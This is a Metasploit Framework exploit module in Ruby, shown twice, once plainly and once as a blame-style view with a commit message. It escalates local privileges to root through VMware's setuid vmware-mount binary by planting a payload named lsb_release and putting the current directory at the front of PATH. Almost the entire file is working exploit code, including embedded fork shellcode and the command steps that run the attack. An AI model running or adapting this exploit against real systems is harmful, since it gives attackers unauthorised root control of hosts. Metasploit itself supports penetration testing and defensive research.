metasploit-framework/modules/exploits/linux/local/vmware_mount.rb

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/file'

class Metasploit4 < Msf::Exploit::Local

	include Msf::Exploit::EXE
	include Msf::Post::Common
	include Msf::Post::File

	def initialize(info={})
		super( update_info( info, {
				'Name'          => 'VMWare Setuid vmware-mount Unsafe popen',
				'Description'   => %q{
					VMWare Workstation (up to and including 9.0.2 build-1031769)
					and Player have a setuid executable called vmware-mount that
					invokes lsb_release in the PATH with popen(3). Since PATH is
					user-controlled, and the default system shell on
					Debian-derived distributions does not drop privs, we can put
					an arbitrary payload in an executable called lsb_release and
					have vmware-mount happily execute it as root for us.
				},
				'License'       => MSF_LICENSE,
				'Author'        => [ 'egypt'],
				'Platform'      => [ 'linux' ],
				'Arch'          => ARCH_X86,
				'Targets'       =>
					[
						[ 'Automatic', { } ],
					],
				'DefaultOptions' => {
					"PrependSetresuid" => true,
					"PrependSetresgid" => true,
				},
				'DefaultTarget' => 0,
				'References' => [
					[ 'URL', "http://blog.cmpxchg8b.com/2013/08/security-debianisms.html" ],
				]
			}
			))
		# Handled by ghetto hardcoding below.
		deregister_options("PrependFork")
	end

	def check
		if setuid?("/usr/bin/vmware-mount")
			CheckCode::Vulnerable
		else
			CheckCode::Safe
		end
	end

	def exploit
		unless check == CheckCode::Vulnerable
			fail_with(Failure::NotVulnerable, "vmware-mount doesn't exist or is not setuid")
		end

		# Ghetto PrependFork action which is apparently only implemented for
		# Meterpreter.
		# XXX Put this in a mixin somewhere
		exe = generate_payload_exe(
			:code => "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x06\x31\xc0\xb0\x01\xcd\x80" + payload.encoded
		)
		write_file("lsb_release", exe)

		cmd_exec("chmod +x lsb_release")
		cmd_exec("PATH=.:$PATH /usr/bin/vmware-mount")
		cmd_exec("rm -f lsb_release")
	end

	def setuid?(remote_file)
		!!(cmd_exec("test -u /usr/bin/vmware-mount && echo true").index "true")
	end

end
Add local exploit for taviso's vmware privesc 2013-08-27 02:06:40 +00:00			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# web site for more information on licensing and terms of use.`
			`# http://metasploit.com/`
			`##`

			`require 'msf/core'`
			`require 'rex'`
			`require 'msf/core/post/common'`
			`require 'msf/core/post/file'`

			`class Metasploit4 < Msf::Exploit::Local`

			`include Msf::Exploit::EXE`
			`include Msf::Post::Common`
			`include Msf::Post::File`

			`def initialize(info={})`
			`super( update_info( info, {`
			`'Name' => 'VMWare Setuid vmware-mount Unsafe popen',`
			`'Description' => %q{`
			`VMWare Workstation (up to and including 9.0.2 build-1031769)`
			`and Player have a setuid executable called vmware-mount that`
			`invokes lsb_release in the PATH with popen(3). Since PATH is`
			`user-controlled, and the default system shell on`
			`Debian-derived distributions does not drop privs, we can put`
			`an arbitrary payload in an executable called lsb_release and`
			`have vmware-mount happily execute it as root for us.`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' => [ 'egypt'],`
			`'Platform' => [ 'linux' ],`
			`'Arch' => ARCH_X86,`
			`'Targets' =>`
			`[`
			`[ 'Automatic', { } ],`
			`],`
			`'DefaultOptions' => {`
			`"PrependSetresuid" => true,`
			`"PrependSetresgid" => true,`
			`},`
			`'DefaultTarget' => 0,`
			`'References' => [`
			`[ 'URL', "http://blog.cmpxchg8b.com/2013/08/security-debianisms.html" ],`
			`]`
			`}`
			`))`
			`# Handled by ghetto hardcoding below.`
			`deregister_options("PrependFork")`
			`end`

			`def check`
			`if setuid?("/usr/bin/vmware-mount")`
			`CheckCode::Vulnerable`
			`else`
			`CheckCode::Safe`
			`end`
			`end`

			`def exploit`
			`unless check == CheckCode::Vulnerable`
			`fail_with(Failure::NotVulnerable, "vmware-mount doesn't exist or is not setuid")`
			`end`

			`# Ghetto PrependFork action which is apparently only implemented for`
			`# Meterpreter.`
			`# XXX Put this in a mixin somewhere`
			`exe = generate_payload_exe(`
			`:code => "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x06\x31\xc0\xb0\x01\xcd\x80" + payload.encoded`
			`)`
			`write_file("lsb_release", exe)`

			`cmd_exec("chmod +x lsb_release")`
			`cmd_exec("PATH=.:$PATH /usr/bin/vmware-mount")`
			`cmd_exec("rm -f lsb_release")`
			`end`

			`def setuid?(remote_file)`
			`!!(cmd_exec("test -u /usr/bin/vmware-mount && echo true").index "true")`
			`end`

			`end`